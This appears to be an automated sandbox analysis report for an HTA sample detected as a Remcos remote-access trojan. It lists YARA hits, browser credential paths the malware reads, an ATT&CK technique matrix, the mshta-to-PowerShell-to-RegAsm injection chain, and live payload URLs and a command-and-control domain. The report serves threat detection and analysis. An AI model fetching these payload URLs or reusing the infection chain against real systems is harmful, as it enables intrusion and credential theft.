Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

Source: Yara match | File source: 9.2.powershell.exe.60cff68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.60cff68.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.8730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.8730000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data (11_2_0040BA4D)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ (11_2_0040BB6B)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db (11_2_0040BB6B)

                      Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-M3P7YT
Source: Yara match | File source: 9.2.powershell.exe.60cff68.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.60cff68.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.8730000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.8730000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.powershell.exe.66ba028.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: cmd.exe (11_2_0040569A)
MITRE ATT&CK Matrix (techniques per tactic column; a leading number is the signature count shown in the report's cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 1 Native API; 1 Exploitation for Client Execution; 22 Command and Scripting Interpreter; 2 Service Execution; 4 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Windows Service; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 1 Windows Service; 222 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 222 Process Injection; Dynamic API Resolution
Credential Access: 1 OS Credential Dumping; 211 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Service Discovery; 3 File and Directory Discovery; 34 System Information Discovery; 21 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 1 Email Collection; 211 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 12 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1518499 | Sample: LJ1IZDkHyE.hta | Start date: 25/09/2024 | Architecture: WINDOWS | Score: 100

Start node: DNS/IP ramcxx.duckdns.org (Uses dynamic DNS services); DNS/IP ia600100.us.archive.org; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 20 other signatures
  mshta.exe 1 (started): Suspicious command line found; PowerShell case anomaly found
    cmd.exe 1 (started): Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); PowerShell case anomaly found
      powershell.exe 3 45 (started): DNS/IP 104.168.32.148, ports 49704, 49708, 80 (AS-COLOCROSSINGUS, United States); dropped nicemeetingsofpictureclearthingstob.Vbs (Unicode); dropped C:\Users\user\AppData\...\rfrvbpim.cmdline (Unicode); Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found; 3 other signatures
        wscript.exe 1 (started): Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
          powershell.exe 7 (started): Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found
            powershell.exe 15 15 (started): DNS/IP ia600100.us.archive.org 207.241.227.240, ports 443, 49705 (INTERNET-ARCHIVEUS, United States); Writes to foreign memory regions; Injects a PE file into a foreign processes
              RegAsm.exe 3 2 (started): DNS/IP ramcxx.duckdns.org 45.134.140.70, ports 49711, 49713, 49715 (INETLTDTR, Georgia); dropped C:\ProgramData\remcos\logs.dat (data); Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures
            conhost.exe (started)
        csc.exe 3 (started): dropped C:\Users\user\AppData\Local\...\rfrvbpim.dll (PE32)
          cvtres.exe 1 (started)
      conhost.exe (started)

Source | Detection | Scanner | Label
LJ1IZDkHyE.hta | 26% | ReversingLabs | Script-WScript.Trojan.Remcos
                      No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://aka.ms/winsvr-2022-pshelp | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF | 100% | Avira URL Cloud | malware
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content | 0% | Avira URL Cloud | safe
http://104.168.32.148 | 0% | Avira URL Cloud | safe
http://104.168.32.148/345/niceme | 0% | Avira URL Cloud | safe
https://ia600100.us.archivL | 0% | Avira URL Cloud | safe
http://104.168.32.148/345/CHPPZA.txt | 0% | Avira URL Cloud | safe
http://www.microsoft. | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
http://104.168.32.148/ | 0% | Avira URL Cloud | safe
http://crl.micro | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 100% | Avira URL Cloud | malware
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL | 0% | Avira URL Cloud | safe
https://ia600100.us.archive.org | 0% | Avira URL Cloud | safe
ramcxx.duckdns.org | 100% | Avira URL Cloud | malware
http://ia600100.us.archive.org | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | (none) | unknown
ramcxx.duckdns.org | 45.134.140.70 | true | true | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIF | true | Avira URL Cloud: malware | unknown
http://104.168.32.148/345/CHPPZA.txt | true | Avira URL Cloud: safe | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | false | Avira URL Cloud: malware | unknown
ramcxx.duckdns.org | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://104.168.32.148/345/niceme | powershell.exe, 00000003.00000002.2169309335.000000000593F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content | powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.archivL | powershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000009.00000002.2256807258.00000000053AF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft. | powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://104.168.32.148 | powershell.exe, 00000009.00000002.2256807258.00000000051E8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp | RegAsm.exe | false | URL Reputation: safe | unknown
http://104.168.32.148/ | powershell.exe, 00000003.00000002.2177473162.0000000008B49000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2290069028.000000000318F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2253530010.0000000000F47000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
